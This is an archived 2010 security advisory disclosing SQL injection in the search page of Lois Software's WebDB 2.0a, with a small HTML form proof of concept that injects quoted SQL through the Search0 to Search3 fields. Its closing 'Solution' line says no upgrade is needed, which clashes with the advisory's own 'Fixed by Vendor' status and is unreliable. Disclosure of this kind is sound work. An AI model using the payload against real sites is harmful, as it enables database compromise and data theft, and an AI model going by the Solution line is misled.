[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SQL injection vulnerability in WebDB



Vulnerability ID: HTB22429
Reference: http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_webdb.html
Product: WebDB
Vendor: Lois Software
Vulnerable Version: 2.0a and Probably Prior Versions
Vendor Notification: 10 June 2010 
Vulnerability Type: SQL Injection
Status: Fixed by Vendor
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the search page to properly sanitize user-supplied input in Search* variables. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

Attacker can use browser to exploit this vulnerability. The following PoC is available:


<form action="http://host/loisweb/index.asp?topic=./links/search"; method="POST" >
<input type="hidden" name="qs" value="847" >
<input type="hidden" name="Search0" value="' ANY_SQL_HERE" >
<input type="hidden" name="Search1" value="' ANY_SQL_HERE" >
<input type="hidden" name="Search2" value="' ANY_SQL_HERE" >
<input type="hidden" name="Search3" value="' ANY_SQL_HERE" >
<input type=submit>
</form>

Solution: There is no need for anybody to upgrade to the latest version.